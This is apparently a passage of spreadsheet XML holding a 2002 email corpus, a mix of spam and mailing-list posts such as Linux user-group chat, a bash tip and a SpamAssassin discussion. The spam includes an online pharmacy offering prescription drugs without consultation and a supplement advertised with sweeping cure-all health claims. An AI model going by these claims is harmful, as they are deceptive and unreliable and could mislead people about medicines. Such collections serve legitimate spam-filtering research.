width=139&gt;&lt;font face="Arial, Helvetica, sans-serif" size=3&gt;&lt;b&gt;&lt;font color=#006699&gt;150 MB Hosting&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=2&gt;&lt;img height=10 src="http://ads.ipowerweb.com!
 /ipowerweb_virtu/images/spacer.gif" 
 width=10&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=16&gt;&lt;img height=5 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/bullets.gif" width=10&gt;&lt;/td&gt;&lt;td width=139&gt;&lt;font face="Arial, Helvetica, sans-serif" size=3&gt;&lt;b&gt;&lt;font color=#006699&gt;25 Pop E-Mails&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=2&gt;&lt;img height=10 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/spacer.gif" width=10&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=16&gt;&lt;img height=5 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/bullets.gif" width=10&gt;&lt;/td&gt;&lt;td width=139&gt;&lt;font face="Arial, Helvetica, sans-serif" size=3&gt;&lt;b&gt;&lt;font color=#006699&gt;Secure Server&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=2&gt;&lt;img height=10 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/spacer.gif" width=10&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=16&gt;&lt;img height=5 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/bullets.gif" width=10&gt;&lt;/td&gt;&lt;td noWrap&gt;&lt;font face="Arial, Helvetica, sans-serif" size=3&gt;&lt;b&gt;&lt;font color=#006699&gt;Unlimited Transfer&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=2&gt;&lt;!
 font face="Verdana, Arial, Helvetic
 a, sans-serif" size=1&gt;&lt;/font&gt;&lt;img height=10 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/spacer.gif" width=10&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=16&gt;&lt;img height=5 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/bullets.gif" width=10&gt;&lt;/td&gt;&lt;td width=139&gt;&lt;font face="Arial, Helvetica, sans-serif" size=3&gt;&lt;b&gt;&lt;font color=#006699&gt;Content Promo&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;td valign=top&gt;&lt;table cellspacing=0 cellpadding=0 width=150 align=center border=0&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td width=16&gt;&lt;img height=5 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/bullets.gif" width=10&gt;&lt;/td&gt;&lt;td width=139&gt;&lt;font face="Arial, Helvetica, sans-serif" size=3&gt;&lt;b&gt;&lt;font color=#006699&gt;Your-Name.com&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=2&gt;&lt;img height=10 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/spacer.gif" width=10&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=16&gt;&lt;img height=5 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/bullets.gif" width=10&gt;&lt;/td&gt;&lt;td width=139&gt;&lt;font face="Arial, Helvetica, san!
 s-serif" size=3&gt;&lt;b&gt;&lt;font color=#006
 699&gt;Your own cgi-bin&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt; &lt;td colspan=2&gt;&lt;img height=10 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/spacer.gif" width=10&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=16&gt;&lt;img height=5 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/bullets.gif" width=10&gt;&lt;/td&gt;&lt;td width=139&gt;&lt;font face="Arial, Helvetica, sans-serif" size=3&gt;&lt;b&gt;&lt;font color=#006699&gt;24/7 FTP Access&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=2&gt;&lt;img height=10 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/spacer.gif" width=10&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=16&gt;&lt;img height=5 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/bullets.gif" width=10&gt;&lt;/td&gt;&lt;td noWrap&gt;&lt;font face="Arial, Helvetica, sans-serif" size=3&gt;&lt;b&gt;&lt;font color=#006699&gt;Detailed Statistics &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=2&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;&lt;/font&gt;&lt;img height=10 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/spacer.gif" width=10&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=16&gt;&lt;img height=5 src="http:/!
 /ads.ipowerweb.com/ipowerweb_virtu/
 images/bullets.gif" width=10&gt;&lt;/td&gt;&lt;td width=139&gt;&lt;font face="Arial, Helvetica, sans-serif" size=3&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;a HREF="http://www.qksrv.net/click-1105018-8003934?URL=https%3A%2F%2Fipowerwe.securesites.com%2Ftracker.cgi%3Frid%3D20"&gt;&lt;font color=#006699&gt;Plus much more!&lt;/font&gt;&lt;/a&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;td&gt;&lt;a HREF="http://www.qksrv.net/click-1105018-8003934?URL=https%3A%2F%2Fipowerwe.securesites.com%2Ftracker.cgi%3Frid%3D20"&gt;&lt;img border=0 height=142 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/monitor.gif" width=180&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;img height=10 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/spacer.gif" width=10&gt;&lt;br&gt;&lt;table cellspacing=0 cellpadding=0 width="100%" border=0&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;img height=92 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/box1.gif" width=170&gt;&lt;img height=91 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/box2.gif" width=208&gt;&lt;img height=91 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/b!
 ox3.gif" width=150 usemap=#Map bord
 er=0&gt; 
                     &lt;map name=Map&gt;
 &lt;area shape=RECT coords=5,55,113,89 HREF="http://www.qksrv.net/click-1105018-8003934?URL=https%3A%2F%2Fipowerwe.securesites.com%2Ftracker.cgi%3Frid%3D20"&gt;&lt;/map&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;table cellspacing=0 cellpadding=0 width=480 border=0&gt;&lt;tbody&gt;&lt;tr valign=top&gt;&lt;td width=506&gt;&lt;font size=2&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color=#336699&gt;&lt;u&gt;Our Equipment: &lt;br&gt;&lt;/u&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;table cellspacing=0 cellpadding=0 width="100%" border=0&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td width="14%"&gt;&lt;img height=50 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/demo_pic_6_sun.gif" width=75&gt;&lt;/td&gt;&lt;td width="11%"&gt;&lt;/td&gt;&lt;td width="13%"&gt;&lt;img height=50 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/demo_pic_6_ciscosys.gif" width=73&gt;&lt;/td&gt;
 &lt;td width="19%"&gt;&lt;/td&gt;&lt;td width="13%"&gt;&lt;img height=50 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/demo_pic_6_cisco.gif" width=72&gt;&lt;/td&gt;&lt;td width="16%"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="14%"&gt;&lt;img height=50 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/demo_pic_6_networkapp.gif" width=76&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br&gt;&lt;table cellspacing=0 cellpadding=0 width="100%" border=0&gt;&lt;tbody&gt;&lt;tr&gt; &lt;td width="13%"&gt;&lt;img height=56 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/demo_pic_6_freebsd.gif" width=71&gt;&lt;/td&gt;&lt;td width="14%"&gt;&lt;/td&gt;&lt;td width="19%"&gt;&lt;img height=56 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/demo_pic_6_mysql.gif" width=102&gt;&lt;/td&gt;&lt;td width="7%"&gt;&lt;/td&gt;&lt;td width="22%"&gt;&lt;img height=56 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/demo_pic_6_frontpage.gif" width=121&gt;&lt;/td&gt;&lt;td width="7%"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="18%"&gt;&lt;div align=right&gt;&lt;img height=56 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/demo_pic_6_php4.gif" width=92&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;fon!
 t size=2&gt;&lt;b&gt;&lt;font face="Verdana, Ar
 ial, Helvetica, sans-serif" color=#336699&gt;&lt;u&gt;&lt;/u&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;
 &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/html&gt;&lt;img src="http://www.qksrv.net/image-1105018-8003934" width="1" height="1" border="0"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Appointment Setting
</t>
  </si>
  <si>
    <t xml:space="preserve">
   &lt;/SCRIPT&gt;
 &lt;center&gt;&lt;table cellpadding=0 cellspacing=0 border=0&gt;&lt;tr&gt;&lt;td
 align=center&gt;&lt;table cellpadding=2 cellspacing=2 border=2&gt;
 &lt;tr&gt;&lt;td align=center bgcolor=fafafa&gt;&lt;table width=400 cellpadding=3
 cellspacing=3 border=0&gt;&lt;tr&gt;&lt;td align=center&gt;
   &lt;b&gt;&lt;font face="arial" size="6" color="#000080"&gt;Professional Appointment 
   Setting&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=380 cellpadding=3 cellspacing=3 border=0&gt;&lt;tr&gt;&lt;td
 align=center&gt;&lt;b&gt;
   &lt;font face="verdana" color="#FF0000"&gt;Commercial &amp;amp; Residential
 Leads&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=380 cellpadding=3 cellspacing=3 border=0&gt;&lt;tr&gt;&lt;td align=center&gt;
   &lt;font face="verdana" size=2 color=#0000FF&gt;&lt;i&gt;&lt;b&gt;
   Immediately catapults your sales&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=370 cellpadding=3 cellspacing=3 border=0&gt;&lt;tr&gt;&lt;td align=center&gt;
 &lt;font size=3 color=#800080 face="verdana"&gt;&lt;/font&gt;&lt;font size=2
 face="verdana" color=#800080&gt; &lt;b&gt;Burglar Alarms&amp;nbsp;&lt;/b&gt; &lt;/font&gt;&lt;font
 size=2 face="verdana" color=003300&gt;
 &lt;font size=3 color=#800080&gt;&lt;/font&gt;&lt;font size=2 face="verdana"
 color=#800080&gt; &lt;b&gt;Home Improvement&lt;/b&gt;&lt;br&gt;
   &lt;/font&gt;
 &lt;font size=3 color=#800080&gt;&amp;#149;&lt;/font&gt;&lt;font size=2 face="verdana"
 color=#800080&gt; &lt;b&gt;Software&amp;nbsp;&lt;/b&gt; &lt;/font&gt;
 &lt;font size=3 color=#800080&gt;&amp;#149;&lt;/font&gt;&lt;font size=2 face="verdana"
 color=#800080&gt; &lt;b&gt;Mortgage&lt;/b&gt;&lt;br&gt;
   &lt;/font&gt;
 &lt;font size=3 color=#800080&gt;&lt;/font&gt;&lt;font size=2 face="verdana"
 color=#800080&gt; &lt;b&gt;Insurance&amp;nbsp; &lt;/b&gt;
   &lt;/font&gt;
 &lt;font size=3 color=#800080&gt;&lt;/font&gt;&lt;font size=2 face="verdana"
 color=#800080&gt; &lt;/font&gt; &lt;/font&gt;&lt;b&gt;
   &lt;font face="verdana" size="2" color="#800080"&gt;Many
 More!!!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=425 cellpadding=4 cellspacing=4 border=0&gt;&lt;tr&gt;&lt;td align=center&gt;
   &lt;font color="#000080" size="6"&gt;$100 Introductory Package:&lt;/font&gt;&lt;p&gt;
   &lt;font color="#000080" size="5"&gt;4 Manhours of Telemarketing
 Services&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align=center&gt;&lt;b&gt;&lt;font face="arial"&gt;Call us Toll Free at
 1-800-683-0545&lt;/font&gt;&lt;/b&gt;&lt;p&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;FONT SIZE=2&gt;&lt;br&gt;&amp;nbsp;&lt;/font&gt;&lt;/center&gt;
 &lt;font color=#000000&gt;&lt;/div&gt;
   &lt;p align="center"&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
   &lt;/p&gt;
   &lt;p align="center"&gt;To remove your address, please send an e-mail message
 with 
   the word REMOVE in the subject line to:  carlreed@core.com&lt;/p&gt;
                                     &lt;hr&gt;
                                     &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
                                     &lt;p class="MsoBodyText"
 align="left"&gt;&amp;nbsp;&lt;/p&gt;
                                     &lt;p class="MsoNormal" align="center"
 style="text-align:center"&gt;&lt;span
 style="font-size:20.0pt;mso-bidi-font-size:12.0pt;color:red"&gt;&lt;o:p&gt;
                                     &lt;/o:p&gt;
                                     &lt;/span&gt;&lt;/p&gt;
                                     &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                                     &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                                     &lt;p&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Madonna is actually quite shy
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8390122,1717/
 Date: 2002-09-30T11:09:20+01:00
 [IMG: http://www.newsisfree.com/Images/fark/sun.gif ([The Sun])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Love Pill Vaaa...i..g.. - Online Pharmacy No consultation fee mbnq
</t>
  </si>
  <si>
    <t xml:space="preserve">NOW ON SALE FOR $129.00 10 100 MG TABLETS
 ************MEN'S  VIAGRA *******************
 VIAGRA
 Propecia
 WOMEN'S
 Ortho Tri-Cyclen
 Vaniqa
 Renova
 Retin-A
 http://myrxexpress.com/index.asp?affiliate=CHOM33
 WEIGHT LOSS
 Xenical
 GENERAL
 Valtrex
 Acyclovir
 Zyban
 BEST PRICES FAST DELIVERY
 NO CONSULTATION FEE!
 NO DISPERSION FEE!
 NO TRICKS !!!
 THE PRICE YOU SEE IS THE PRICE YOU PAY! CHOOSE YOUR OWN SHIPPING METHOD AND SAVE MONEY!
 TRACK YOUR ORDER FROM THE MOMENT IT IS PLACED UNTIL DELIVERY.
 OUR US LICENSED PHYSICIANS WILL REVIEW YOUR ORDER AND
 IF APPROVED YOUR ORDER WILL BE SHIPPED BY OUR US LICENSED PHARMACY.
 NO CHARGES WILL BE APPLIED UNLESS YOU ARE APPROVED.
 Click here to order now. http://myrxexpress.com/index.asp?affiliate=CHOM33
 If you received this email in error we apologize for any inconvenience To  be removed from
 our mailing list please Click Here mailto:ttessr@hotmail.com?Subj=Remove address 
 to send email with the subject remove
 Sorry for any inconvenience.  All removal requests are handled as soon as possible
 hcpfakmooysjlmqrudocrqrah
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Can men live like kings in their own home?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
    &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
    &lt;meta name="GENERATOR" content="Mozilla/4.77 [en] (Windows NT 5.0; U) [Netscape]"&gt;
    &lt;title&gt;ironmandan&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;center&gt;&lt;b&gt;&lt;font color="#FF0000"&gt;&lt;font size=+4&gt;Explode Your Sex Life&lt;br&gt;
 &lt;/font&gt;&lt;/font&gt;&lt;font color="#000000"&gt;&lt;font size=+3&gt;All Natural Alternative!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;center&gt;&lt;table BORDER=0 COLS=1 WIDTH="42%" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;center&gt;&lt;font face="Arial,Helvetica"&gt;&lt;b&gt;Men of Iron&lt;/b&gt; has been featured
 on over 100 TV News and Top Radio stations across America, and we know
 why...&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;It REALLY works!&lt;/font&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;b&gt;&lt;blink&gt;&lt;font color="#FF0000"&gt;&lt;font size=+2&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blink&gt;&lt;/b&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;b&gt;&lt;blink&gt;&lt;font color="#FF0000"&gt;&lt;font size=+2&gt;Buy Two Bottles and&lt;/font&gt;&lt;/font&gt;&lt;/blink&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;blink&gt;&lt;font color="#FF0000"&gt;&lt;font size=+2&gt;Get One FREE&lt;/font&gt;&lt;/font&gt;&lt;/blink&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font color="#3333FF"&gt;&lt;font size=+2&gt;Formulated for Men&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font color="#000000"&gt;&lt;font size=+2&gt;No Doctor Visit required!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font color="#000000"&gt;&lt;font size=+2&gt;No Prescription needed!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font color="#000000"&gt;&lt;font size=+2&gt;Not A Drug!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+2&gt;&lt;a href="http://66.231.133.202/menofiron/"&gt;Click
 Here to Visit Our Web Site&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;br&gt;&lt;b&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+2&gt;&lt;a href="http://66.231.133.202/menofiron/"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt; 
 &lt;center&gt;&lt;table BORDER=0 COLS=1 WIDTH="44%" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;Iron Man Benefits:&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; Number 1 formula for men&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; Dramatically Enhances Organism&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; No Negative Side Effects (All
 Natural Ingredients). &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; Boosts Multiple Orgasms!&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; Does Not Increase Blood Pressure! &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; Increases circulation in men
 so erections become firmer. &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; Helps men with a sexual response
 dysfunction, or  lack of &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;  interest in sex. &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; Clears impotency problems. &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; Boosts Multiple Climaxes. &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; Relieves Emotional Ups Downs,
 and Headaches!&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; Helps Relieve Prostate Problems. &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; Lowers Cholesterol. &lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt; Very Affordable Price&lt;/font&gt;
 &lt;p&gt;&lt;font face="Arial,Helvetica"&gt;&lt;a href="http://66.231.133.202/menofiron/"&gt;Visit
 Our Web Site Click Here:  Learn about our special offer!&lt;/a&gt;&lt;/font&gt;
 &lt;p&gt;&lt;br&gt;&lt;a href="http://66.231.133.202/menofiron/remove.html"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;br&gt; 
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Fwd: Linux Beer Hike
</t>
  </si>
  <si>
    <t xml:space="preserve">I am the evil one, you will respect my authoritai ;--)
 Sorry, but I couldn't resist, I must say that mails like this really impress
 me. coz I have pretty much no Irish at all, although my wee Girl starts
 Gaelscoil in September so there hope for me yet :)
 Much Respect to the Gaeilgors out there. 
 CW
 -------------------
 mar
 &gt; gheall ar an Hike ar an gclr - an mbeidh t fin n aon duine eile le
 &gt; Gaeilge ar an Hike go bhfios duit?
 &gt; 
 &gt; Go raibh maith agat as do chabhair,
 &gt; 
 ----&gt;8
 Can someone translate this for me? Lost all sense of Irish when moved
 over the border about 10 years ago. Not by choice mind you :-(
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">kevin lyda wrote:
 &gt; On Mon, Aug 19, 2002 at 10:27:57AM +0100, Padraig Brady wrote:
 &gt; 
 &gt;&gt;&gt;On Fri, Aug 16, 2002 at 05:26:33PM +0100, Padraig Brady wrote:
 &gt;&gt;&gt;
 &gt;&gt;&gt;&gt;How can I repeat a string an arbitrary number
 &gt;&gt;&gt;&gt;of times in bash/sed/...
 &gt;&gt;&gt;&gt;
 &gt;&gt;&gt;&gt;I.E. I'm missing the repeat in the following:
 &gt;&gt;&gt;&gt;
 &gt;&gt;&gt;&gt;STRING="&gt; "
 &gt;&gt;&gt;&gt;NUMBER=3
 &gt;&gt;&gt;&gt;PREFIX=repeat $STRING $NUMBER
 &gt;&gt;&gt;&gt;echo $PREFIX
 &gt;&gt;&gt;
 &gt; 
 &gt; huh?  i missed all this.  do you want the string all on one line?
 &gt; 
 &gt; the string repeated over and over, but with linebreaks in between,
 &gt; this works:
 &gt; 
 &gt;     yes "$STRING" | head -"$NUMBER"
 &gt; 
 &gt; use sed to remove the newline i guess if you want.  the utilities yes,
 &gt; head and sed are on pretty much every unix.
 Good. I actually looking at `yes` but I was in
 slow mode on Friday and didn't consider combining with `head`
 To remove newlines then handiest is: tr -d '\n'
 thanks,
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Getting yourself removed from spam lists
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --7ZAtKRhVyVSsbBD2
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Fri, Sep 13, 2002 at 03:21:08PM +0200, carlo@alinoe.com wrote:
 &gt; So... it seems to me that they DO clean up
 &gt; their lists, but only when a spam fails to
 &gt; deliver - or can't they detect that?
 &gt;=20
 &gt; What do spammers do with email addresses in
 &gt; their database that are undeliverable for a
 &gt; few years?  Do they still continue to spam
 &gt; them?
 Well, here's my semi-coherent rant for the moment.  ;)
 I have &gt;3100 spamtraps on my machine (you can multiply that by each domain
 if you really want to).  The vast majority (all but, say, 10) have never
 ever existed.  Yet, spammers would semi-continuously connect, try to
 deliver mail to 40 of them, disconnect, connect again, try delivering
 to 40 more...  over and over, they kept getting "User unknown" until I
 got around to making them spamtraps.
 So my evidence would suggest that it depends who you're dealing with. :)
 If your "business" is to sell address lists to people who would then spam,
 it's in your best interest to never clean your list.  Therefore you can
 say "10 million email addresses" and not technically be lying, even if
 the majority of them don't work.
 If you're a spammer, you'd want to know who doesn't actually exist, but
 then again you don't really care: you probably want to relay through
 someone so it's harder to trace you, if you could you'd send to every
 email address available, you don't want to setup a valid bounce address
 because again it's easy to trace you.
 So I would say this, if you technically spam people but actually think
 you're running a legit service, you probably really do have a way of
 opting out (even though the user didn't opt in) and you probably don't
 relay, and you probably pay attention to bounces.
 Everyone else doesn't really care.
 That's my view anyway. :)
 --=20
 Randomly Generated Tagline:
 "Now you can do that thing with your hands... It's ok." - Prof. Farr
 --7ZAtKRhVyVSsbBD2
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9gfANAuOQUeWAs2MRAvNfAJ9oyV5MxrnHSKUu3yliMzc9hYcGFACeK11X
 NOiPnUCgVS0uzsTxM3iY8vs=
 =b/Y6
 -----END PGP SIGNATURE-----
 --7ZAtKRhVyVSsbBD2--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</si>
  <si>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Rendering the Great Outdoors: Fast Occlusion Culling for Outdoor
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613679,159/
 Date: 2002-10-06T18:12:41+01:00
 Rendering engines used in todays game titles utilize various techniques for 
 hidden surface removal (HSR), different techniques being suitable for different 
 game genres. For example, action games played in closed-in locations need an 
 engine allowing fast rendering of a few hundred polygons, a high frame rate, 
 and a high level of details to impress players. Conversely, a game that is 
 taking place outdoors requires quite a different approach. This features 
 present one one technique for hidden surface removal usable in 3D engines using 
 tilizing object occlusion.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; On Mon, 9 Sep 2002, "Rick" == Rick Baartman wrote:
   Rick&gt; This is dangerous; I have to remember to re-scan each
   Rick&gt; folder I enter. Is there a safeguard for this?
 Nope.  Regenerate the cache in the script
 	for f in `folders -fast -r`
 	do
 		echo sorting $f ...
 		sortm +$f
 		scan `mhpath +`/$f/.xmhcache
 	done
 --Hal
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: d4x 2.03 package
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!
 i have just found a small issue with the downloader 4 x update. the ftp search engines are missing something like:
 %{_datadir}/d4x/ftpsearch.xml 
 thanks in advance,
 che
 p.s. i love the xmms-xosd plugin :)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Legal services for pennies a day! ljnhz
</t>
  </si>
  <si>
    <t xml:space="preserve">How would you like a Top Rated Law Firm working for you, your family and your business for only pennies a day?
 CLICK HERE
 http://211.78.96.242/legalservices/
 Get full details on this great service! FREE!
 Whether it's a simple speeding ticket or an extensive child custody case, we cover all areas of the legal system.
 * Court Appearances on Your Behalf
 * Unlimited Phone Consultations
 * Review of ALL Your Legal Documents &amp; Contracts
 * Take Care of Credit Problems
 And that is just the beginning!
 CLICK HERE
 http://211.78.96.242/legalservices/
 to get full details on this great service!
 ************************************************
 Simple Removal instructions:
 To be removed from our in-house list simply visit
 http://211.78.96.242/removal/remove.htm
 Enter your email addresses to unsubscribe.
</t>
  </si>
  <si>
